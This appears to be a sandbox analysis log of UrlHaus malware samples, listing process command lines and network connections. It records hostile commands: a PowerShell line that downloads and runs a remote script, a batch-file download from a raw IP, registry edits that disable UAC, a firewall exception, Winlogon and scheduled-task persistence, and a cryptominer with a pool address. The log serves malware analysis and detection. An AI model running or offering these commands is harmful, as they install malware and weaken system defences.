"C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe"

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\paste.ps1"

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe

"C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe"

C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe

"C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5076 -ip 5076

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 536

C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe

"C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE

C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe

"C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe"

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffb26c2cc40,0x7ffb26c2cc4c,0x7ffb26c2cc58

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe" -service -lunch

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1908 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2140 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2232,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2428 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3168 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3176,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3204 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4488,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4500 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\Windows Security Health Host.exe,"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 9

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4860,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4908 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4932,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4936 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

"cmd" /c ping 127.0.0.1 -n 9 > nul && copy "C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe" "C:\Users\Admin\Music\Windows Security Health Host.exe" && ping 127.0.0.1 -n 9 > nul && "C:\Users\Admin\Music\Windows Security Health Host.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 9

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4964,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4688 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4664,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5108 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4916,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4524 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4484,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4652 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4632,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5244 /prefetch:2

C:\Users\Admin\Downloads\UrlHausFiles\unik.exe

"C:\Users\Admin\Downloads\UrlHausFiles\unik.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xdc,0x100,0x104,0x7c,0x108,0x7ffb26c346f8,0x7ffb26c34708,0x7ffb26c34718

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\Windows Security Health Host.exe,"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 9

C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe

"C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe"

C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe

"C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe"

C:\Users\Admin\Music\Windows Security Health Host.exe

"C:\Users\Admin\Music\Windows Security Health Host.exe"

C:\Users\Admin\Music\Windows Security Health Host.exe

"C:\Users\Admin\Music\Windows Security Health Host.exe"

C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe

"C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4fc 0x2ec

C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7848.tmp\7849.tmp\784A.bat C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE","goto :target","","runas",1)(window.close)

C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE" goto :target

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7A1D.tmp\7A1E.tmp\7A1F.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE goto :target"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffb265946f8,0x7ffb26594708,0x7ffb26594718

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:1

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\client.exe

"C:\Users\Admin\Downloads\UrlHausFiles\client.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

"C:\Users\Admin\Downloads\UrlHausFiles\file.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')

C:\Program Files (x86)\seetrol\client\SeetrolClient.exe

"C:\Program Files (x86)\seetrol\client\SeetrolClient.exe"

C:\Windows\SysWOW64\ipconfig.exe

"C:\Windows\System32\ipconfig.exe" /flushdns

C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe

"C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DGDAEHCBGIIJ" & exit

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\Downloads\UrlHausFiles\file.exe" >> NUL

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 85.31.47.143:3333 -a rx -k -u KAS:kaspa:qqjn2sfatk0dmj0x47yns4xlyp3avwp46mhum864y5kc3hcrajwy7v5npvpn8.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.66.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 49.66.101.151.in-addr.arpa udp
N/A 127.0.0.1:60079 tcp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 cdn.chuk.cz udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 utorrent-backup-server4.top udp
US 8.8.8.8:53 utorrent-backup-server3.top udp
CN 139.196.31.48:14417 tcp
CN 139.196.31.48:2324 tcp
JP 121.1.252.90:80 121.1.252.90 tcp
CN 114.215.27.238:2324 tcp
CN 101.229.61.157:8072 tcp
CN 114.215.27.238:8100 tcp
CN 110.90.9.121:8072 tcp
CN 114.215.27.238:8072 tcp
CN 61.144.96.138:888 tcp
CH 138.188.36.82:80 138.188.36.82 tcp
TR 5.26.97.52:88 5.26.97.52 tcp
JP 122.31.166.101:80 122.31.166.101 tcp
CH 138.188.34.220:80 138.188.34.220 tcp
IN 111.118.250.244:80 111.118.250.244 tcp
CA 76.11.16.231:80 76.11.16.231 tcp
TR 178.242.54.178:80 178.242.54.178 tcp
US 75.18.210.21:80 75.18.210.21 tcp
DE 62.216.196.186:80 62.216.196.186 tcp
HK 219.77.72.53:80 tcp
BR 179.89.224.192:80 179.89.224.192 tcp
CA 99.233.83.22:80 99.233.83.22 tcp
MO 202.175.60.117:80 202.175.60.117 tcp
FR 80.15.103.89:80 80.15.103.89 tcp
CN 110.40.250.173:2324 tcp
CN 113.85.101.199:81 tcp
US 67.190.47.69:8081 67.190.47.69 tcp
CN 124.70.36.56:80 tcp
IT 93.47.199.117:80 93.47.199.117 tcp
TW 122.116.26.47:4080 122.116.26.47 tcp
KR 121.142.127.237:8605 121.142.127.237 tcp
CN 121.235.184.125:9000 tcp
TW 122.116.26.47:8443 122.116.26.47 tcp
CN 61.183.16.127:14417 tcp
CN 58.208.14.94:88 tcp
TR 178.242.54.178:88 178.242.54.178 tcp
KR 218.155.74.6:7070 218.155.74.6 tcp
CN 150.158.146.215:80 tcp
CN 49.81.40.231:111 tcp
BR 187.59.102.238:9090 187.59.102.238 tcp
CN 111.42.156.130:8000 tcp
CN 49.81.203.0:111 tcp
KR 222.104.204.78:8000 222.104.204.78 tcp
